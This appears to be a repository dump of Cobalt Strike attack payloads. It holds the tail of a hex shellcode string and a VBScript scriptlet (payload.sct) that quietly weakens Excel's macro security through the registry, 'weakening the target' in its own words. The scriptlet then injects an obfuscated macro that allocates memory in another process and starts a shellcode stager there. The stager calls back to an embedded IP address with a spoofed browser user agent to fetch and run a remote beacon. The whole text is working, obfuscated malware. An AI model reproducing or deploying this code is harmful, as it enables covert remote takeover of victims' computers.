\x51\x53\x89\xe7\x57\x68\x00\x20\x00\x00\x53\x56\x68\x12\x96\x89\xe2\xff\xd5\x85\xc0\x74\xc6\x8b\x07\x01\xc3\x85\xc0\x75\xe5\x58\xc3\xe8\xa9\xfd\xff\xff\x31\x39\x32\x2e\x31\x36\x38\x2e\x31\x35\x34\x2e\x31\x33\x31\x00\x00\x00\x00\x00"


================================================
FILE: CobaltStrike_Trojanlinkage/CobaltStrike_Payload/payload.sct
================================================
<?XML version="1.0"?>
<scriptlet>
	<registration progid="e00684" classid="{53cb5c98-fa0e-4378-99a4-8743642ed01d}" >
		<script language="vbscript">
		<![CDATA[
			Dim objExcel, WshShell, RegPath, action, objWorkbook, xlmodule

Set objExcel = CreateObject("Excel.Application")
objExcel.Visible = False

Set WshShell = CreateObject("Wscript.Shell")

function RegExists(regKey)
	on error resume next
	WshShell.RegRead regKey
	RegExists = (Err.number = 0)
end function

' Get the old AccessVBOM value
RegPath = "HKEY_CURRENT_USER\Software\Microsoft\Office\" & objExcel.Version & "\Excel\Security\AccessVBOM"

if RegExists(RegPath) then
	action = WshShell.RegRead(RegPath)
else
	action = ""
end if

' Weaken the target
WshShell.RegWrite RegPath, 1, "REG_DWORD"

' Run the macro
Set objWorkbook = objExcel.Workbooks.Add()
Set xlmodule = objWorkbook.VBProject.VBComponents.Add(1)
xlmodule.CodeModule.AddFromString "Private "&"Type PRO"&"CESS_INF"&"ORMATION"&Chr(10)&"    hPro"&"cess As "&"Long"&Chr(10)&"    hThr"&"ead As L"&"ong"&Chr(10)&"    dwPr"&"ocessId "&"As Long"&Chr(10)&"    dwTh"&"readId A"&"s Long"&Chr(10)& _
"End Type"&Chr(10)&Chr(10)&"Private "&"Type STA"&"RTUPINFO"&Chr(10)&"    cb A"&"s Long"&Chr(10)&"    lpRe"&"served A"&"s String"&Chr(10)&"    lpDe"&"sktop As"&" String"&Chr(10)&"    lpTi"&"tle As S"&"tring"& _
Chr(10)&"    dwX "&"As Long"&Chr(10)&"    dwY "&"As Long"&Chr(10)&"    dwXS"&"ize As L"&"ong"&Chr(10)&"    dwYS"&"ize As L"&"ong"&Chr(10)&"    dwXC"&"ountChar"&"s As Lon"&"g"&Chr(10)&"    dwYC"&"ountChar"& _
"s As Lon"&"g"&Chr(10)&"    dwFi"&"llAttrib"&"ute As L"&"ong"&Chr(10)&"    dwFl"&"ags As L"&"ong"&Chr(10)&"    wSho"&"wWindow "&"As Integ"&"er"&Chr(10)&"    cbRe"&"served2 "&"As Integ"&"er"&Chr(10)&"    lpRe"& _
"served2 "&"As Long"&Chr(10)&"    hStd"&"Input As"&" Long"&Chr(10)&"    hStd"&"Output A"&"s Long"&Chr(10)&"    hStd"&"Error As"&" Long"&Chr(10)&"End Type"&Chr(10)&Chr(10)&Chr(35)&"If VBA7 "&"Then"&Chr(10)& _
"    Priv"&"ate Decl"&"are PtrS"&"afe Func"&"tion Cre"&"ateStuff"&" Lib "&Chr(34)&"kernel32"&Chr(34)&" Alias "&Chr(34)&"CreateRe"&"moteThre"&"ad"&Chr(34)&" "&Chr(40)&"ByVal hP"&"rocess A"&"s Long"&Chr(44)& _
" ByVal l"&"pThreadA"&"ttribute"&"s As Lon"&"g"&Chr(44)&" ByVal d"&"wStackSi"&"ze As Lo"&"ng"&Chr(44)&" ByVal l"&"pStartAd"&"dress As"&" LongPtr"&Chr(44)&" lpParam"&"eter As "&"Long"&Chr(44)&" ByVal d"& _
"wCreatio"&"nFlags A"&"s Long"&Chr(44)&" lpThrea"&"dID As L"&"ong"&Chr(41)&" As Long"&"Ptr"&Chr(10)&"    Priv"&"ate Decl"&"are PtrS"&"afe Func"&"tion All"&"ocStuff "&"Lib "&Chr(34)&"kernel32"&Chr(34)&" Alias "& _
Chr(34)&"VirtualA"&"llocEx"&Chr(34)&" "&Chr(40)&"ByVal hP"&"rocess A"&"s Long"&Chr(44)&" ByVal l"&"pAddr As"&" Long"&Chr(44)&" ByVal l"&"Size As "&"Long"&Chr(44)&" ByVal f"&"lAllocat"&"ionType "&"As Long"& _
Chr(44)&" ByVal f"&"lProtect"&" As Long"&Chr(41)&" As Long"&"Ptr"&Chr(10)&"    Priv"&"ate Decl"&"are PtrS"&"afe Func"&"tion Wri"&"teStuff "&"Lib "&Chr(34)&"kernel32"&Chr(34)&" Alias "&Chr(34)&"WritePro"& _
"cessMemo"&"ry"&Chr(34)&" "&Chr(40)&"ByVal hP"&"rocess A"&"s Long"&Chr(44)&" ByVal l"&"Dest As "&"LongPtr"&Chr(44)&" ByRef S"&"ource As"&" Any"&Chr(44)&" ByVal L"&"ength As"&" Long"&Chr(44)&" ByVal L"& _
"engthWro"&"te As Lo"&"ngPtr"&Chr(41)&" As Long"&"Ptr"&Chr(10)&"    Priv"&"ate Decl"&"are PtrS"&"afe Func"&"tion Run"&"Stuff Li"&"b "&Chr(34)&"kernel32"&Chr(34)&" Alias "&Chr(34)&"CreatePr"&"ocessA"&Chr(34)& _
" "&Chr(40)&"ByVal lp"&"Applicat"&"ionName "&"As Strin"&"g"&Chr(44)&" ByVal l"&"pCommand"&"Line As "&"String"&Chr(44)&" lpProce"&"ssAttrib"&"utes As "&"Any"&Chr(44)&" lpThrea"&"dAttribu"&"tes As A"&"ny"& _
Chr(44)&" ByVal b"&"InheritH"&"andles A"&"s Long"&Chr(44)&" ByVal d"&"wCreatio"&"nFlags A"&"s Long"&Chr(44)&" lpEnvir"&"onment A"&"s Any"&Chr(44)&" ByVal l"&"pCurrent"&"Director"&"y As Str"&"ing"&Chr(44)& _
" lpStart"&"upInfo A"&"s STARTU"&"PINFO"&Chr(44)&" lpProce"&"ssInform"&"ation As"&" PROCESS"&"_INFORMA"&"TION"&Chr(41)&" As Long"&Chr(10)&Chr(35)&"Else"&Chr(10)&"    Priv"&"ate Decl"&"are Func"&"tion Cre"& _
"ateStuff"&" Lib "&Chr(34)&"kernel32"&Chr(34)&" Alias "&Chr(34)&"CreateRe"&"moteThre"&"ad"&Chr(34)&" "&Chr(40)&"ByVal hP"&"rocess A"&"s Long"&Chr(44)&" ByVal l"&"pThreadA"&"ttribute"&"s As Lon"&"g"&Chr(44)& _
" ByVal d"&"wStackSi"&"ze As Lo"&"ng"&Chr(44)&" ByVal l"&"pStartAd"&"dress As"&" Long"&Chr(44)&" lpParam"&"eter As "&"Long"&Chr(44)&" ByVal d"&"wCreatio"&"nFlags A"&"s Long"&Chr(44)&" lpThrea"&"dID As L"& _
"ong"&Chr(41)&" As Long"&Chr(10)&"    Priv"&"ate Decl"&"are Func"&"tion All"&"ocStuff "&"Lib "&Chr(34)&"kernel32"&Chr(34)&" Alias "&Chr(34)&"VirtualA"&"llocEx"&Chr(34)&" "&Chr(40)&"ByVal hP"&"rocess A"& _
"s Long"&Chr(44)&" ByVal l"&"pAddr As"&" Long"&Chr(44)&" ByVal l"&"Size As "&"Long"&Chr(44)&" ByVal f"&"lAllocat"&"ionType "&"As Long"&Chr(44)&" ByVal f"&"lProtect"&" As Long"&Chr(41)&" As Long"&Chr(10)& _
"    Priv"&"ate Decl"&"are Func"&"tion Wri"&"teStuff "&"Lib "&Chr(34)&"kernel32"&Chr(34)&" Alias "&Chr(34)&"WritePro"&"cessMemo"&"ry"&Chr(34)&" "&Chr(40)&"ByVal hP"&"rocess A"&"s Long"&Chr(44)&" ByVal l"& _
"Dest As "&"Long"&Chr(44)&" ByRef S"&"ource As"&" Any"&Chr(44)&" ByVal L"&"ength As"&" Long"&Chr(44)&" ByVal L"&"engthWro"&"te As Lo"&"ng"&Chr(41)&" As Long"&Chr(10)&"    Priv"&"ate Decl"&"are Func"&"tion Run"& _
"Stuff Li"&"b "&Chr(34)&"kernel32"&Chr(34)&" Alias "&Chr(34)&"CreatePr"&"ocessA"&Chr(34)&" "&Chr(40)&"ByVal lp"&"Applicat"&"ionName "&"As Strin"&"g"&Chr(44)&" ByVal l"&"pCommand"&"Line As "&"String"&Chr(44)& _
" lpProce"&"ssAttrib"&"utes As "&"Any"&Chr(44)&" lpThrea"&"dAttribu"&"tes As A"&"ny"&Chr(44)&" ByVal b"&"InheritH"&"andles A"&"s Long"&Chr(44)&" ByVal d"&"wCreatio"&"nFlags A"&"s Long"&Chr(44)&" lpEnvir"& _
"onment A"&"s Any"&Chr(44)&" ByVal l"&"pCurrent"&"Driector"&"y As Str"&"ing"&Chr(44)&" lpStart"&"upInfo A"&"s STARTU"&"PINFO"&Chr(44)&" lpProce"&"ssInform"&"ation As"&" PROCESS"&"_INFORMA"&"TION"&Chr(41)& _
" As Long"&Chr(10)&Chr(35)&"End If"&Chr(10)&Chr(10)&"Sub Auto"&"_Open"&Chr(40)&Chr(41)&Chr(10)&"    Dim "&"myByte A"&"s Long"&Chr(44)&" myArray"&" As Vari"&"ant"&Chr(44)&" offset "&"As Long"&Chr(10)&"    Dim "& _
"pInfo As"&" PROCESS"&"_INFORMA"&"TION"&Chr(10)&"    Dim "&"sInfo As"&" STARTUP"&"INFO"&Chr(10)&"    Dim "&"sNull As"&" String"&Chr(10)&"    Dim "&"sProc As"&" String"&Chr(10)&Chr(10)&Chr(35)&"If VBA7 "& _
"Then"&Chr(10)&"    Dim "&"rwxpage "&"As LongP"&"tr"&Chr(44)&" res As "&"LongPtr"&Chr(10)&Chr(35)&"Else"&Chr(10)&"    Dim "&"rwxpage "&"As Long"&Chr(44)&" res As "&"Long"&Chr(10)&Chr(35)&"End If"&Chr(10)& _
"    myAr"&"ray "&Chr(61)&" Array"&Chr(40)&Chr(45)&"4"&Chr(44)&Chr(45)&"24"&Chr(44)&Chr(45)&"119"&Chr(44)&"0"&Chr(44)&"0"&Chr(44)&"0"&Chr(44)&"96"&Chr(44)&Chr(45)&"119"&Chr(44)&Chr(45)&"27"&Chr(44)&"49"& _
Chr(44)&Chr(45)&"46"&Chr(44)&"100"&Chr(44)&Chr(45)&"117"&Chr(44)&"82"&Chr(44)&"48"&Chr(44)&Chr(45)&"117"&Chr(44)&"82"&Chr(44)&"12"&Chr(44)&Chr(45)&"117"&Chr(44)&"82"&Chr(44)&"20"&Chr(44)&Chr(45)&"117"& _
Chr(44)&"114"&Chr(44)&"40"&Chr(44)&"15"&Chr(44)&Chr(45)&"73"&Chr(44)&"74"&Chr(44)&"38"&Chr(44)&"49"&Chr(44)&Chr(45)&"1"&Chr(44)&"49"&Chr(44)&Chr(45)&"64"&Chr(44)&Chr(45)&"84"&Chr(44)&"60"&Chr(44)&"97"& _
Chr(44)&"124"&Chr(44)&"2"&Chr(44)&"44"&Chr(44)&"32"&Chr(44)&Chr(45)&"63"&Chr(44)&Chr(45)&"49"&Chr(44)&" _"&Chr(10)&"13"&Chr(44)&"1"&Chr(44)&Chr(45)&"57"&Chr(44)&Chr(45)&"30"&Chr(44)&Chr(45)&"16"&Chr(44)& _
"82"&Chr(44)&"87"&Chr(44)&Chr(45)&"117"&Chr(44)&"82"&Chr(44)&"16"&Chr(44)&Chr(45)&"117"&Chr(44)&"66"&Chr(44)&"60"&Chr(44)&"1"&Chr(44)&Chr(45)&"48"&Chr(44)&Chr(45)&"117"&Chr(44)&"64"&Chr(44)&"120"&Chr(44)& _
Chr(45)&"123"&Chr(44)&Chr(45)&"64"&Chr(44)&"116"&Chr(44)&"74"&Chr(44)&"1"&Chr(44)&Chr(45)&"48"&Chr(44)&"80"&Chr(44)&Chr(45)&"117"&Chr(44)&"72"&Chr(44)&"24"&Chr(44)&Chr(45)&"117"&Chr(44)&"88"&Chr(44)&"32"& _
Chr(44)&"1"&Chr(44)&Chr(45)&"45"&Chr(44)&Chr(45)&"29"&Chr(44)&"60"&Chr(44)&"73"&Chr(44)&Chr(45)&"117"&Chr(44)&"52"&Chr(44)&Chr(45)&"117"&Chr(44)&"1"&Chr(44)&" _"&Chr(10)&Chr(45)&"42"&Chr(44)&"49"&Chr(44)& _
Chr(45)&"1"&Chr(44)&"49"&Chr(44)&Chr(45)&"64"&Chr(44)&Chr(45)&"84"&Chr(44)&Chr(45)&"63"&Chr(44)&Chr(45)&"49"&Chr(44)&"13"&Chr(44)&"1"&Chr(44)&Chr(45)&"57"&Chr(44)&"56"&Chr(44)&Chr(45)&"32"&Chr(44)&"117"& _
Chr(44)&Chr(45)&"12"&Chr(44)&"3"&Chr(44)&"125"&Chr(44)&Chr(45)&"8"&Chr(44)&"59"&Chr(44)&"125"&Chr(44)&"36"&Chr(44)&"117"&Chr(44)&Chr(45)&"30"&Chr(44)&"88"&Chr(44)&Chr(45)&"117"&Chr(44)&"88"&Chr(44)&"36"& _
Chr(44)&"1"&Chr(44)&Chr(45)&"45"&Chr(44)&"102"&Chr(44)&Chr(45)&"117"&Chr(44)&"12"&Chr(44)&"75"&Chr(44)&Chr(45)&"117"&Chr(44)&"88"&Chr(44)&"28"&Chr(44)&"1"&Chr(44)&Chr(45)&"45"&Chr(44)&Chr(45)&"117"&Chr(44)& _
"4"&Chr(44)&" _"&Chr(10)&Chr(45)&"117"&Chr(44)&"1"&Chr(44)&Chr(45)&"48"&Chr(44)&Chr(45)&"119"&Chr(44)&"68"&Chr(44)&"36"&Chr(44)&"36"&Chr(44)&"91"&Chr(44)&"91"&Chr(44)&"97"&Chr(44)&"89"&Chr(44)&"90"&Chr(44)& _
"81"&Chr(44)&Chr(45)&"1"&Chr(44)&Chr(45)&"32"&Chr(44)&"88"&Chr(44)&"95"&Chr(44)&"90"&Chr(44)&Chr(45)&"117"&Chr(44)&"18"&Chr(44)&Chr(45)&"21"&Chr(44)&Chr(45)&"122"&Chr(44)&"93"&Chr(44)&"104"&Chr(44)&"110"& _
Chr(44)&"101"&Chr(44)&"116"&Chr(44)&"0"&Chr(44)&"104"&Chr(44)&"119"&Chr(44)&"105"&Chr(44)&"110"&Chr(44)&"105"&Chr(44)&"84"&Chr(44)&"104"&Chr(44)&"76"&Chr(44)&"119"&Chr(44)&"38"&Chr(44)&"7"&Chr(44)&Chr(45)& _
"1"&Chr(44)&" _"&Chr(10)&Chr(45)&"43"&Chr(44)&"49"&Chr(44)&Chr(45)&"1"&Chr(44)&"87"&Chr(44)&"87"&Chr(44)&"87"&Chr(44)&"87"&Chr(44)&"87"&Chr(44)&"104"&Chr(44)&"58"&Chr(44)&"86"&Chr(44)&"121"&Chr(44)&Chr(45)& _
"89"&Chr(44)&Chr(45)&"1"&Chr(44)&Chr(45)&"43"&Chr(44)&Chr(45)&"23"&Chr(44)&Chr(45)&"124"&Chr(44)&"0"&Chr(44)&"0"&Chr(44)&"0"&Chr(44)&"91"&Chr(44)&"49"&Chr(44)&Chr(45)&"55"&Chr(44)&"81"&Chr(44)&"81"&Chr(44)& _
"106"&Chr(44)&"3"&Chr(44)&"81"&Chr(44)&"81"&Chr(44)&"104"&Chr(44)&"36"&Chr(44)&"5"&Chr(44)&"0"&Chr(44)&"0"&Chr(44)&"83"&Chr(44)&"80"&Chr(44)&"104"&Chr(44)&"87"&Chr(44)&Chr(45)&"119"&Chr(44)&Chr(45)&"97"& _
Chr(44)&" _"&Chr(10)&Chr(45)&"58"&Chr(44)&Chr(45)&"1"&Chr(44)&Chr(45)&"43"&Chr(44)&Chr(45)&"21"&Chr(44)&"112"&Chr(44)&"91"&Chr(44)&"49"&Chr(44)&Chr(45)&"46"&Chr(44)&"82"&Chr(44)&"104"&Chr(44)&"0"&Chr(44)& _
"2"&Chr(44)&"96"&Chr(44)&Chr(45)&"124"&Chr(44)&"82"&Chr(44)&"82"&Chr(44)&"82"&Chr(44)&"83"&Chr(44)&"82"&Chr(44)&"80"&Chr(44)&"104"&Chr(44)&Chr(45)&"21"&Chr(44)&"85"&Chr(44)&"46"&Chr(44)&"59"&Chr(44)&Chr(45)& _
"1"&Chr(44)&Chr(45)&"43"&Chr(44)&Chr(45)&"119"&Chr(44)&Chr(45)&"58"&Chr(44)&Chr(45)&"125"&Chr(44)&Chr(45)&"61"&Chr(44)&"80"&Chr(44)&"49"&Chr(44)&Chr(45)&"1"&Chr(44)&"87"&Chr(44)&"87"&Chr(44)&"106"&Chr(44)& _
Chr(45)&"1"&Chr(44)&"83"&Chr(44)&"86"&Chr(44)&" _"&Chr(10)&"104"&Chr(44)&"45"&Chr(44)&"6"&Chr(44)&"24"&Chr(44)&"123"&Chr(44)&Chr(45)&"1"&Chr(44)&Chr(45)&"43"&Chr(44)&Chr(45)&"123"&Chr(44)&Chr(45)&"64"& _
Chr(44)&"15"&Chr(44)&Chr(45)&"124"&Chr(44)&Chr(45)&"61"&Chr(44)&"1"&Chr(44)&"0"&Chr(44)&"0"&Chr(44)&"49"&Chr(44)&Chr(45)&"1"&Chr(44)&Chr(45)&"123"&Chr(44)&Chr(45)&"10"&Chr(44)&"116"&Chr(44)&"4"&Chr(44)& _
Chr(45)&"119"&Chr(44)&Chr(45)&"7"&Chr(44)&Chr(45)&"21"&Chr(44)&"9"&Chr(44)&"104"&Chr(44)&Chr(45)&"86"&Chr(44)&Chr(45)&"59"&Chr(44)&Chr(45)&"30"&Chr(44)&"93"&Chr(44)&Chr(45)&"1"&Chr(44)&Chr(45)&"43"&Chr(44)& _
Chr(45)&"119"&Chr(44)&Chr(45)&"63"&Chr(44)&"104"&Chr(44)&"69"&Chr(44)&"33"&Chr(44)&"94"&Chr(44)&"49"&Chr(44)&Chr(45)&"1"&Chr(44)&" _"&Chr(10)&Chr(45)&"43"&Chr(44)&"49"&Chr(44)&Chr(45)&"1"&Chr(44)&"87"& _
Chr(44)&"106"&Chr(44)&"7"&Chr(44)&"81"&Chr(44)&"86"&Chr(44)&"80"&Chr(44)&"104"&Chr(44)&Chr(45)&"73"&Chr(44)&"87"&Chr(44)&Chr(45)&"32"&Chr(44)&"11"&Chr(44)&Chr(45)&"1"&Chr(44)&Chr(45)&"43"&Chr(44)&Chr(45)& _
"65"&Chr(44)&"0"&Chr(44)&"47"&Chr(44)&"0"&Chr(44)&"0"&Chr(44)&"57"&Chr(44)&Chr(45)&"57"&Chr(44)&"116"&Chr(44)&Chr(45)&"73"&Chr(44)&"49"&Chr(44)&Chr(45)&"1"&Chr(44)&Chr(45)&"23"&Chr(44)&Chr(45)&"111"&Chr(44)& _
"1"&Chr(44)&"0"&Chr(44)&"0"&Chr(44)&Chr(45)&"23"&Chr(44)&Chr(45)&"55"&Chr(44)&"1"&Chr(44)&"0"&Chr(44)&"0"&Chr(44)&Chr(45)&"24"&Chr(44)&Chr(45)&"117"&Chr(44)&Chr(45)&"1"&Chr(44)&" _"&Chr(10)&Chr(45)&"1"& _
Chr(44)&Chr(45)&"1"&Chr(44)&"47"&Chr(44)&"119"&Chr(44)&"98"&Chr(44)&"78"&Chr(44)&"53"&Chr(44)&"0"&Chr(44)&"98"&Chr(44)&"97"&Chr(44)&"105"&Chr(44)&"100"&Chr(44)&"117"&Chr(44)&"46"&Chr(44)&"99"&Chr(44)&"111"& _
Chr(44)&"109"&Chr(44)&"0"&Chr(44)&"98"&Chr(44)&"97"&Chr(44)&"105"&Chr(44)&"100"&Chr(44)&"117"&Chr(44)&"46"&Chr(44)&"99"&Chr(44)&"111"&Chr(44)&"109"&Chr(44)&"0"&Chr(44)&"98"&Chr(44)&"97"&Chr(44)&"105"&Chr(44)& _
"100"&Chr(44)&"117"&Chr(44)&"46"&Chr(44)&"99"&Chr(44)&"111"&Chr(44)&"109"&Chr(44)&"0"&Chr(44)&"98"&Chr(44)&"97"&Chr(44)&" _"&Chr(10)&"105"&Chr(44)&"100"&Chr(44)&"117"&Chr(44)&"46"&Chr(44)&"99"&Chr(44)& _
"111"&Chr(44)&"109"&Chr(44)&"0"&Chr(44)&"98"&Chr(44)&"97"&Chr(44)&"105"&Chr(44)&"100"&Chr(44)&"117"&Chr(44)&"46"&Chr(44)&"99"&Chr(44)&"111"&Chr(44)&"109"&Chr(44)&"0"&Chr(44)&"98"&Chr(44)&"97"&Chr(44)&"105"& _
Chr(44)&"100"&Chr(44)&"117"&Chr(44)&"46"&Chr(44)&"99"&Chr(44)&"111"&Chr(44)&"109"&Chr(44)&"0"&Chr(44)&"98"&Chr(44)&"97"&Chr(44)&"105"&Chr(44)&"100"&Chr(44)&"117"&Chr(44)&"46"&Chr(44)&"99"&Chr(44)&"111"& _
Chr(44)&"109"&Chr(44)&"0"&Chr(44)&"98"&Chr(44)&"97"&Chr(44)&" _"&Chr(10)&"105"&Chr(44)&"0"&Chr(44)&"85"&Chr(44)&"115"&Chr(44)&"101"&Chr(44)&"114"&Chr(44)&"45"&Chr(44)&"65"&Chr(44)&"103"&Chr(44)&"101"&Chr(44)& _
"110"&Chr(44)&"116"&Chr(44)&"58"&Chr(44)&"32"&Chr(44)&"77"&Chr(44)&"111"&Chr(44)&"122"&Chr(44)&"105"&Chr(44)&"108"&Chr(44)&"108"&Chr(44)&"97"&Chr(44)&"47"&Chr(44)&"53"&Chr(44)&"46"&Chr(44)&"48"&Chr(44)& _
"32"&Chr(44)&"40"&Chr(44)&"99"&Chr(44)&"111"&Chr(44)&"109"&Chr(44)&"112"&Chr(44)&"97"&Chr(44)&"116"&Chr(44)&"105"&Chr(44)&"98"&Chr(44)&"108"&Chr(44)&"101"&Chr(44)&"59"&Chr(44)&"32"&Chr(44)&"77"&Chr(44)& _
" _"&Chr(10)&"83"&Chr(44)&"73"&Chr(44)&"69"&Chr(44)&"32"&Chr(44)&"49"&Chr(44)&"48"&Chr(44)&"46"&Chr(44)&"48"&Chr(44)&"59"&Chr(44)&"32"&Chr(44)&"87"&Chr(44)&"105"&Chr(44)&"110"&Chr(44)&"100"&Chr(44)&"111"& _
Chr(44)&"119"&Chr(44)&"115"&Chr(44)&"32"&Chr(44)&"78"&Chr(44)&"84"&Chr(44)&"32"&Chr(44)&"54"&Chr(44)&"46"&Chr(44)&"50"&Chr(44)&"59"&Chr(44)&"32"&Chr(44)&"87"&Chr(44)&"105"&Chr(44)&"110"&Chr(44)&"54"&Chr(44)& _
"52"&Chr(44)&"59"&Chr(44)&"32"&Chr(44)&"120"&Chr(44)&"54"&Chr(44)&"52"&Chr(44)&"59"&Chr(44)&"32"&Chr(44)&"84"&Chr(44)&"114"&Chr(44)&" _"&Chr(10)&"105"&Chr(44)&"100"&Chr(44)&"101"&Chr(44)&"110"&Chr(44)& _
"116"&Chr(44)&"47"&Chr(44)&"54"&Chr(44)&"46"&Chr(44)&"48"&Chr(44)&"41"&Chr(44)&"13"&Chr(44)&"10"&Chr(44)&"0"&Chr(44)&"98"&Chr(44)&"97"&Chr(44)&"105"&Chr(44)&"100"&Chr(44)&"117"&Chr(44)&"46"&Chr(44)&"99"& _
Chr(44)&"111"&Chr(44)&"109"&Chr(44)&"0"&Chr(44)&"98"&Chr(44)&"97"&Chr(44)&"105"&Chr(44)&"100"&Chr(44)&"117"&Chr(44)&"46"&Chr(44)&"99"&Chr(44)&"111"&Chr(44)&"109"&Chr(44)&"0"&Chr(44)&"98"&Chr(44)&"97"&Chr(44)& _
"105"&Chr(44)&"100"&Chr(44)&"117"&Chr(44)&"46"&Chr(44)&"99"&Chr(44)&" _"&Chr(10)&"111"&Chr(44)&"109"&Chr(44)&"0"&Chr(44)&"98"&Chr(44)&"97"&Chr(44)&"105"&Chr(44)&"100"&Chr(44)&"117"&Chr(44)&"46"&Chr(44)& _
"99"&Chr(44)&"111"&Chr(44)&"109"&Chr(44)&"0"&Chr(44)&"98"&Chr(44)&"97"&Chr(44)&"105"&Chr(44)&"100"&Chr(44)&"117"&Chr(44)&"46"&Chr(44)&"99"&Chr(44)&"111"&Chr(44)&"109"&Chr(44)&"0"&Chr(44)&"98"&Chr(44)&"97"& _
Chr(44)&"105"&Chr(44)&"100"&Chr(44)&"117"&Chr(44)&"46"&Chr(44)&"99"&Chr(44)&"111"&Chr(44)&"109"&Chr(44)&"0"&Chr(44)&"98"&Chr(44)&"97"&Chr(44)&"105"&Chr(44)&"100"&Chr(44)&"117"&Chr(44)&"46"&Chr(44)&"99"& _
Chr(44)&" _"&Chr(10)&"111"&Chr(44)&"109"&Chr(44)&"0"&Chr(44)&"98"&Chr(44)&"97"&Chr(44)&"105"&Chr(44)&"100"&Chr(44)&"117"&Chr(44)&"46"&Chr(44)&"99"&Chr(44)&"111"&Chr(44)&"109"&Chr(44)&"0"&Chr(44)&"98"&Chr(44)& _
"97"&Chr(44)&"105"&Chr(44)&"100"&Chr(44)&"117"&Chr(44)&"46"&Chr(44)&"99"&Chr(44)&"111"&Chr(44)&"109"&Chr(44)&"0"&Chr(44)&"98"&Chr(44)&"97"&Chr(44)&"105"&Chr(44)&"100"&Chr(44)&"117"&Chr(44)&"46"&Chr(44)& _
"99"&Chr(44)&"111"&Chr(44)&"109"&Chr(44)&"0"&Chr(44)&"98"&Chr(44)&"97"&Chr(44)&"105"&Chr(44)&"100"&Chr(44)&"117"&Chr(44)&"46"&Chr(44)&"99"&Chr(44)&" _"&Chr(10)&"111"&Chr(44)&"109"&Chr(44)&"0"&Chr(44)&"98"& _
Chr(44)&"97"&Chr(44)&"105"&Chr(44)&"100"&Chr(44)&"117"&Chr(44)&"46"&Chr(44)&"99"&Chr(44)&"111"&Chr(44)&"109"&Chr(44)&"0"&Chr(44)&"98"&Chr(44)&"97"&Chr(44)&"105"&Chr(44)&"100"&Chr(44)&"117"&Chr(44)&"46"& _
Chr(44)&"99"&Chr(44)&"111"&Chr(44)&"109"&Chr(44)&"0"&Chr(44)&"98"&Chr(44)&"97"&Chr(44)&"105"&Chr(44)&"100"&Chr(44)&"117"&Chr(44)&"46"&Chr(44)&"99"&Chr(44)&"111"&Chr(44)&"109"&Chr(44)&"0"&Chr(44)&"98"&Chr(44)& _
"97"&Chr(44)&"105"&Chr(44)&"100"&Chr(44)&"117"&Chr(44)&"46"&Chr(44)&"99"&Chr(44)&" _"&Chr(10)&"111"&Chr(44)&"109"&Chr(44)&"0"&Chr(44)&"98"&Chr(44)&"97"&Chr(44)&"105"&Chr(44)&"100"&Chr(44)&"117"&Chr(44)& _
"46"&Chr(44)&"99"&Chr(44)&"111"&Chr(44)&"109"&Chr(44)&"0"&Chr(44)&"98"&Chr(44)&"97"&Chr(44)&"105"&Chr(44)&"100"&Chr(44)&"117"&Chr(44)&"46"&Chr(44)&"99"&Chr(44)&"111"&Chr(44)&"109"&Chr(44)&"0"&Chr(44)&"98"& _
Chr(44)&"97"&Chr(44)&"105"&Chr(44)&"100"&Chr(44)&"117"&Chr(44)&"46"&Chr(44)&"99"&Chr(44)&"111"&Chr(44)&"109"&Chr(44)&"0"&Chr(44)&"98"&Chr(44)&"97"&Chr(44)&"105"&Chr(44)&"100"&Chr(44)&"117"&Chr(44)&"46"& _
Chr(44)&"99"&Chr(44)&" _"&Chr(10)&"111"&Chr(44)&"109"&Chr(44)&"0"&Chr(44)&"98"&Chr(44)&"97"&Chr(44)&"105"&Chr(44)&"100"&Chr(44)&"117"&Chr(44)&"46"&Chr(44)&"99"&Chr(44)&"111"&Chr(44)&"109"&Chr(44)&"0"&Chr(44)& _
"98"&Chr(44)&"97"&Chr(44)&"105"&Chr(44)&"100"&Chr(44)&"117"&Chr(44)&"46"&Chr(44)&"99"&Chr(44)&"111"&Chr(44)&"109"&Chr(44)&"0"&Chr(44)&"98"&Chr(44)&"97"&Chr(44)&"0"&Chr(44)&"104"&Chr(44)&Chr(45)&"16"&Chr(44)& _
Chr(45)&"75"&Chr(44)&Chr(45)&"94"&Chr(44)&"86"&Chr(44)&Chr(45)&"1"&Chr(44)&Chr(45)&"43"&Chr(44)&"106"&Chr(44)&"64"&Chr(44)&"104"&Chr(44)&"0"&Chr(44)&"16"&Chr(44)&"0"&Chr(44)&"0"&Chr(44)&" _"&Chr(10)&"104"& _
Chr(44)&"0"&Chr(44)&"0"&Chr(44)&"64"&Chr(44)&"0"&Chr(44)&"87"&Chr(44)&"104"&Chr(44)&"88"&Chr(44)&Chr(45)&"92"&Chr(44)&"83"&Chr(44)&Chr(45)&"27"&Chr(44)&Chr(45)&"1"&Chr(44)&Chr(45)&"43"&Chr(44)&Chr(45)& _
"109"&Chr(44)&Chr(45)&"71"&Chr(44)&"0"&Chr(44)&"0"&Chr(44)&"0"&Chr(44)&"0"&Chr(44)&"1"&Chr(44)&Chr(45)&"39"&Chr(44)&"81"&Chr(44)&"83"&Chr(44)&Chr(45)&"119"&Chr(44)&Chr(45)&"25"&Chr(44)&"87"&Chr(44)&"104"& _
Chr(44)&"0"&Chr(44)&"32"&Chr(44)&"0"&Chr(44)&"0"&Chr(44)&"83"&Chr(44)&"86"&Chr(44)&"104"&Chr(44)&"18"&Chr(44)&Chr(45)&"106"&Chr(44)&Chr(45)&"119"&Chr(44)&Chr(45)&"30"&Chr(44)&Chr(45)&"1"&Chr(44)&Chr(45)& _
"43"&Chr(44)&" _"&Chr(10)&Chr(45)&"123"&Chr(44)&Chr(45)&"64"&Chr(44)&"116"&Chr(44)&Chr(45)&"58"&Chr(44)&Chr(45)&"117"&Chr(44)&"7"&Chr(44)&"1"&Chr(44)&Chr(45)&"61"&Chr(44)&Chr(45)&"123"&Chr(44)&Chr(45)& _
"64"&Chr(44)&"117"&Chr(44)&Chr(45)&"27"&Chr(44)&"88"&Chr(44)&Chr(45)&"61"&Chr(44)&Chr(45)&"24"&Chr(44)&Chr(45)&"87"&Chr(44)&Chr(45)&"3"&Chr(44)&Chr(45)&"1"&Chr(44)&Chr(45)&"1"&Chr(44)&"49"&Chr(44)&"57"& _
Chr(44)&"50"&Chr(44)&"46"&Chr(44)&"49"&Chr(44)&"54"&Chr(44)&"56"&Chr(44)&"46"&Chr(44)&"49"&Chr(44)&"53"&Chr(44)&"52"&Chr(44)&"46"&Chr(44)&"49"&Chr(44)&"51"&Chr(44)&"49"&Chr(44)&"0"&Chr(44)&"0"&Chr(44)& _
